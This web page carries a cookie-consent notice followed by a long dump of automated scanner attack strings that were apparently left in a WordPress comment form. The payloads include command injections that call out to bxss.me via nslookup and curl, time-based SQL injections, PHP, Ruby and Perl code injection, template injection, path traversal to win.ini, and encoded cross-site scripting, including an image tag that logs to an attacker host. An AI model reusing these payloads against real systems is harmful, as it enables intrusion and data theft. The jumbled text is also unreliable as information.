Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
1
1
555
555
${9999792+9999052}
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
http://bxss.me/t/fit.txt?.jpg
555
555
555
555
555
“.gethostbyname(lc(“hitbu”.”vgtpfztw6eb93.bxss.me.”)).”A”.chr(67).chr(hex(“58″)).chr(112).chr(88).chr(102).chr(66).”
555|echo bvhzuh$()\ szmavm\nz^xyu||a #’ |echo bvhzuh$()\ szmavm\nz^xyu||a #|” |echo bvhzuh$()\ szmavm\nz^xyu||a #
555
555
&(nslookup -q=cname hitsxjopivzow4b340.bxss.me||curl hitsxjopivzow4b340.bxss.me)&’\”`0&(nslookup -q=cname hitsxjopivzow4b340.bxss.me||curl hitsxjopivzow4b340.bxss.me)&`’
`(nslookup -q=cname hitopmlilzucyf7a8b.bxss.me||curl hitopmlilzucyf7a8b.bxss.me)`
|(nslookup${IFS}-q${IFS}cname${IFS}hittmlxcedkhaf0ed0.bxss.me||curl${IFS}hittmlxcedkhaf0ed0.bxss.me)
555
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
${@print(md5(31337))}\
555
555
‘A’.concat(70-3).concat(22*4).concat(115).concat(80).concat(121).concat(87)+(require’socket’
Socket.gethostbyname(‘hitrk’+’sfrfiwsu0fc23.bxss.me.’)[3].to_s)
555
wp-comments-post.php
555
555
555
555
555
555
555
555Q9HG82nm
-1 OR 2+486-486-1=0+0+0+1
-1 OR 3*2<(0+5+486-486)
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555-1; waitfor delay ‘0:0:15’ —
555-1); waitfor delay ‘0:0:15’ —
555-1 waitfor delay ‘0:0:15’ —
555PV2r0MMh’; waitfor delay ‘0:0:15’ —
555-1 OR 698=(SELECT 698 FROM PG_SLEEP(15))–
555-1)) OR 902=(SELECT 902 FROM PG_SLEEP(15))–
555bCqZxH3a’ OR 161=(SELECT 161 FROM PG_SLEEP(15))–
555YhoxHdQD’) OR 519=(SELECT 519 FROM PG_SLEEP(15))–
555p7XpRjea’)) OR 413=(SELECT 413 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555%2527%2522\’\”
555
1Cr9mxmt8SO
1gooJ4xd4
1*1
1+133-128-5
12345′”\’\”);|]*%00{%0d%0a%bf%27’💡
1
-1 OR 2+134-134-1=0+0+0+1
1′”
@@I72rd
“+response.write(9730196*9335906)+”
1
(nslookup -q=cname hitjdncdeikpybadb4.bxss.me||curl hitjdncdeikpybadb4.bxss.me))
&nslookup -q=cname hitkhttiifycyd1be8.bxss.me&’\”`0&nslookup -q=cname hitkhttiifycyd1be8.bxss.me&`’
&(nslookup -q=cname hitfhbmevkteu43346.bxss.me||curl hitfhbmevkteu43346.bxss.me)&’\”`0&(nslookup -q=cname hitfhbmevkteu43346.bxss.me||curl hitfhbmevkteu43346.bxss.me)&`’
|(nslookup -q=cname hiteqtoieaocsc07b4.bxss.me||curl hiteqtoieaocsc07b4.bxss.me)
`(nslookup -q=cname hitmjsgpxaikp301e6.bxss.me||curl hitmjsgpxaikp301e6.bxss.me)`
;(nslookup -q=cname hitsjiknrhhxsbe043.bxss.me||curl hitsjiknrhhxsbe043.bxss.me)|(nslookup -q=cname hitsjiknrhhxsbe043.bxss.me||curl hitsjiknrhhxsbe043.bxss.me)&(nslookup -q=cname hitsjiknrhhxsbe043.bxss.me||curl hitsjiknrhhxsbe043.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitimfmouawfwbd8d8.bxss.me||curl${IFS}hitimfmouawfwbd8d8.bxss.me)&’\”`0&(nslookup${IFS}-q${IFS}cname${IFS}hitimfmouawfwbd8d8.bxss.me||curl${IFS}hitimfmouawfwbd8d8.bxss.me)&`’
1
1
;assert(base64_decode(‘cHJpbnQobWQ1KDMxMzM3KSk7’));
1
1
1
1
1
1
1
555
1
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
<!–
555
19573668
http://bxss.me/t/xss.html?%00
1
555
<th:t="${dfb}#foreach
‘+’A’.concat(70-3).concat(22*4).concat(117).concat(82).concat(108).concat(80)+(require’socket’
Socket.gethostbyname(‘hitoo’+’sekmzwagb1a87.bxss.me.’)[3].to_s)+’
dfb{{98991*97996}}xca
“dfbzzzzzzzzbbbccccdddeeexca”.replace(“z”,”o”)
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%38%58%4E%76%28%39%39%35%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
1
1
555
555
${9999158+9999221}
1
1
1
555
555
555
555&n958301=v993827
bxss.me
555
555
555
555
555
555&echo trcgbg$()\ qolrdv\nz^xyu||a #’ &echo trcgbg$()\ qolrdv\nz^xyu||a #|” &echo trcgbg$()\ qolrdv\nz^xyu||a #
${@print(md5(31337))}
&nslookup -q=cname hitcmjeijurbe29c91.bxss.me&’\”`0&nslookup -q=cname hitcmjeijurbe29c91.bxss.me&`’
`(nslookup -q=cname hitbndqdcidjucdedc.bxss.me||curl hitbndqdcidjucdedc.bxss.me)`
555
bxss.me/t/xss.html?%00
555
555
‘+’A’.concat(70-3).concat(22*4).concat(101).concat(90).concat(99).concat(68)+(require’socket’
Socket.gethostbyname(‘hitjx’+’vinxbqnb25582.bxss.me.’)[3].to_s)+’
wp-comments-post.php
wp-comments-post.php/.
555
555
555
555
555
555
5555dJgOCSn
555*1
555+864-859-5
-1 OR 3+549-549-1=0+0+0+1
555*if(now()=sysdate(),sleep(15),0)
5550’XOR(555*if(now()=sysdate(),sleep(15),0))XOR’Z
5550″XOR(555*if(now()=sysdate(),sleep(15),0))XOR”Z
(select(0)from(select(sleep(15)))v)/*’+(select(0)from(select(sleep(15)))v)+'”+(select(0)from(select(sleep(15)))v)+”*/
555-1; waitfor delay ‘0:0:15’ —
555-1); waitfor delay ‘0:0:15’ —
555-1 waitfor delay ‘0:0:15’ —
555VsexFsaE’; waitfor delay ‘0:0:15’ —
555-1 OR 315=(SELECT 315 FROM PG_SLEEP(15))–
555-1) OR 370=(SELECT 370 FROM PG_SLEEP(15))–
555-1)) OR 531=(SELECT 531 FROM PG_SLEEP(15))–
555UtJDIUG5′ OR 805=(SELECT 805 FROM PG_SLEEP(15))–
555Ktp7nZBk’) OR 569=(SELECT 569 FROM PG_SLEEP(15))–
555YHcL5sAm’)) OR 179=(SELECT 179 FROM PG_SLEEP(15))–
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555’||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||’
555
19748439
bfg4125%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl4125
bfgx8467%C0%BEz1%C0%BCz2a%90bcxhjl8467
1}}”}}’}}1%>”%>’%>
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
1F9URY[!+!]
%31%3C%53%63%52%69%50%74%20%3E%70%4D%64%4E%289508%29%3C%2F%73%43%72%69%70%54%3E
1Z5YVY[!+!]
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
http://bxss.me/t/fit.txt?.jpg
555
../../../../../../../../../../../../../../windows/win.ini
555
‘+response.write(9113765*9808018)+’
555
555
555&n986499=v949846
555
&echo gqrmcb$()\ cdzrfp\nz^xyu||a #’ &echo gqrmcb$()\ cdzrfp\nz^xyu||a #|” &echo gqrmcb$()\ cdzrfp\nz^xyu||a #
$(nslookup -q=cname hitvjnkvghukj6aac5.bxss.me||curl hitvjnkvghukj6aac5.bxss.me)
|(nslookup -q=cname hitxrbjwnpcie41b2f.bxss.me||curl hitxrbjwnpcie41b2f.bxss.me)
;(nslookup -q=cname hitraqujdofizb3dee.bxss.me||curl hitraqujdofizb3dee.bxss.me)|(nslookup -q=cname hitraqujdofizb3dee.bxss.me||curl hitraqujdofizb3dee.bxss.me)&(nslookup -q=cname hitraqujdofizb3dee.bxss.me||curl hitraqujdofizb3dee.bxss.me)
555
‘.gethostbyname(lc(‘hitxs’.’wfkfppcb67327.bxss.me.’)).’A’.chr(67).chr(hex(’58’)).chr(103).chr(84).chr(105).chr(87).’
555’&&sleep(27*1000)*erckrv&&’
555
555
555
“;print(md5(31337));$a=”
‘.print(md5(31337)).’
555
555
555
555
555
555
555
“+”A”.concat(70-3).concat(22*4).concat(98).concat(85).concat(119).concat(81)+(require”socket”
Socket.gethostbyname(“hitfk”+”vwqyvdtm699e6.bxss.me.”)[3].to_s)+”
555
555
555
555
555
555
5559547614
555CCYKE[!+!]
555\u003CScRiPt\ZD4P(9181)\u003C/sCripT\u003E
555<img sRc='http://attacker-9078/log.php?
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555tkssJosi
555*120*115*0
555+667-662-5
555*269*264*0
555*482*477*0
-1 OR 2+497-497-1=0+0+0+1
-1 OR 3*2>(0+5+497-497)
-1 OR 2+1-1+1=1 AND 497=497
555%2527%2522\’\”
555
19523402
1YU4DA[!+!]
1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%77%79%49%58%28%39%31%38%30%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E
%31%3C%53%63%52%69%50%74%20%3E%77%79%49%58%289685%29%3C%2F%73%43%72%69%70%54%3E
1<ScRiPt>wyIX(9462)</sCripT>
1IXH8Y[!+!]